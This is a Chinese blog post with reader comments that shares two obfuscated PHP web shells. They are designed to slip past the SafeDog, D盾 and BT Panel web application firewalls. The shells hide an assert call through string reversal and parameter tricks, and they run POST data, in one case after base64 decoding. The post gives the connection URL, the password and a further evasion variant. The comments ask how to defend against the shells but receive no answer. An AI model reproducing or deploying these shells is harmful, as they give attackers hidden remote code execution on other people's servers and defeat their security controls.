分享一个过狗过D盾的小马(过宝塔WAF)

作者: print("") 分类: 信息安全 发布时间: 2018-07-06 13:51

tools 看了下看过可以过D盾的。就看看过宝塔的效果

发现很有意思

<?php
$arr = strrev('tressa');
$arr($_POST[strcspn('di', 'ke')]);
?>

密码2 

拿自己站做了测试

第二个过狗的WAF

$arr = array_chunk($_GET['str'],1);
if($arr!=''){
        $con = str_replace('鸡儿','变长5厘米',$arr[0][0]);
        $con(base64_decode($_POST[strcspn('di', 'ke')]));
}

https://www.o2oxy.cn/aa.php?str[]=assert   密码2

连接上去

如果担心assert通过$_GET传值会被拦截,可以把
$arr = array_chunk($_GET[‘str’],1);  替换成$arr = array_chunk(array(strrev($_GET[‘str’][0])),1);
替换后连接地址就是:127.0.0.1/1.php?str[]=tressa
就是代码显得有点多。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

6
说点什么

avatar
4 Comment threads
2 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
4 Comment authors
print("")养狐人susuperbox Recent comment authors
  Subscribe  
最新 最旧 得票最多
提醒
box
游客
box

.user.ini文件没有吗?这个文件不是宝塔会自动创建吗?我就是被这个配置文件拦住了,里面限制了base_dir

super
游客
super

有没有什么方式可以防御这个

su
游客
su

有没有什么方式可以防御这个

养狐人
游客

第二个过狗的测试用不了 请问有什么条件么你测试成功的代码能否截个图